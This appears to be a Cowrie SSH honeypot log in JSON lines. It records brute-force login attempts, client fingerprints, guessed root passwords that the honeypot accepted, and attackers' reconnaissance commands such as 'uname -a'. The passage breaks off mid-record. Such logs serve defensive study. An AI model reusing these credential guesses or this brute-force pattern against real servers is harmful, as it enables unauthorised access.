{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.913464Z","src_ip":"185.93.89.7","session":"e017eface500"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.931842Z","src_ip":"185.93.89.7","session":"e017eface500"}
{"eventid":"cowrie.login.failed","username":"index","password":"qazxsw","message":"login attempt [index/qazxsw] failed","sensor":"my-vps","timestamp":"2025-08-28T10:00:15.988440Z","src_ip":"185.93.89.7","session":"e017eface500"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:17.069432Z","src_ip":"185.93.89.7","session":"e017eface500"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T10:00:20.838080Z","src_ip":"51.79.164.132","session":"e4768f8387a8"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:23.044673Z","src_ip":"51.79.164.132","session":"e4768f8387a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53883,"dst_ip":"1.2.3.4","dst_port":22,"session":"02efc7265e51","protocol":"ssh","message":"New connection: 212.227.125.160:53883 (1.2.3.4:22) [session: 02efc7265e51]","sensor":"my-vps","timestamp":"2025-08-28T10:00:31.877296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:31.986850Z","src_ip":"212.227.125.160","session":"02efc7265e51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:00:32.308198Z","src_ip":"212.227.125.160","session":"02efc7265e51"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:00:36.359942Z","src_ip":"212.227.125.160","session":"02efc7265e51"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:40.186997Z","src_ip":"212.227.125.160","session":"02efc7265e51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63568,"dst_ip":"1.2.3.4","dst_port":22,"session":"83e7207e1498","protocol":"ssh","message":"New connection: 212.227.125.160:63568 (1.2.3.4:22) [session: 83e7207e1498]","sensor":"my-vps","timestamp":"2025-08-28T10:00:40.262909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:40.425022Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:00:40.425730Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52658,"dst_ip":"1.2.3.4","dst_port":22,"session":"76117ffcf0a6","protocol":"ssh","message":"New connection: 185.93.89.7:52658 (1.2.3.4:22) [session: 76117ffcf0a6]","sensor":"my-vps","timestamp":"2025-08-28T10:00:41.692575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:41.712534Z","src_ip":"185.93.89.7","session":"76117ffcf0a6"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:00:41.713354Z","src_ip":"185.93.89.7","session":"76117ffcf0a6"}
{"eventid":"cowrie.login.failed","username":"index","password":"asdfg","message":"login attempt [index/asdfg] failed","sensor":"my-vps","timestamp":"2025-08-28T10:00:41.768313Z","src_ip":"185.93.89.7","session":"76117ffcf0a6"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":54184,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4bcd5b58242","protocol":"ssh","message":"New connection: 51.79.164.132:54184 (1.2.3.4:22) [session: a4bcd5b58242]","sensor":"my-vps","timestamp":"2025-08-28T10:00:42.062994Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2QAZ","message":"login attempt [root/1qaz2QAZ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:00:42.294344Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:42.675818Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:00:42.676506Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:42.789686Z","src_ip":"185.93.89.7","session":"76117ffcf0a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:00:43.222779Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T10:00:43.223254Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:43.224838Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:43.226039Z","src_ip":"212.227.125.160","session":"83e7207e1498"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":17805,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a0a38d62227","protocol":"ssh","message":"New connection: 212.227.235.229:17805 (1.2.3.4:22) [session: 9a0a38d62227]","sensor":"my-vps","timestamp":"2025-08-28T10:00:44.043807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:00:44.337123Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:00:44.342832Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.login.success","username":"root","password":"0987654321","message":"login attempt [root/0987654321] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:00:46.666962Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T10:00:46.880114Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:00:47.844584Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T10:00:47.845302Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T10:00:48.667068Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T10:00:48.667773Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:48.669753Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:48.670798Z","src_ip":"212.227.235.229","session":"9a0a38d62227"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:49.591122Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:00:49.592301Z","src_ip":"51.79.164.132","session":"a4bcd5b58242"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53072,"dst_ip":"1.2.3.4","dst_port":22,"session":"1074aa7c9fa0","protocol":"ssh","message":"New connection: 185.93.89.7:53072 (1.2.3.4:22) [session: 1074aa7c9fa0]","sensor":"my-vps","timestamp":"2025-08-28T10:01:06.637588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:01:06.638827Z","src_ip":"185.93.89.7","session":"1074aa7c9fa0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T10:01:06.656601Z","src_ip":"185.93.89.7","session":"1074aa7c9fa0"}
{"eventid":"cowrie.login.failed","username":"index","password":"22222222","message":"login attempt [index/22222222] failed","sensor":"my-vps","timestamp":"2025-08-28T10:01:06.694520Z","src_ip":"185.93.89.7","session":"1074aa7c9fa0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:01:07.751743Z","src_ip":"185.93.89.7","session":"1074aa7c9fa0"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":60356,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad63fd174268","protocol":"ssh","message":"New connection: 51.79.164.132:60356 (1.2.3.4:22) [session: ad63fd174268]","sensor":"my-vps","timestamp":"2025-08-28T10:01:08.714965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:01:09.092664Z","src_ip":"51.79.164.132","session":"ad63fd174268"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T10:01:09.093450Z","src_ip":"51.79.164.132","session":"ad63fd174268"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T10:01:12.279774Z","src_ip":"51.79.164.132","session":"ad63fd174268"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T10:01:13.513570Z","src_ip":"51.79.164.132","session":"ad63fd174268"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57606,"dst_ip":"1.2.3.4","dst_port":22,"session":"6af3c070ef38","protocol":"ssh","message":"New connection: 185.93.89.7:57606 (1.2.3.4:22) [session: 6af3c070ef38]","sensor":"my-vps","timestamp":"2025-08-28T10:01:31.032308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T10:01:31.043271Z","src_ip":"185.93.89.7","session":"6af3c070ef38"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521",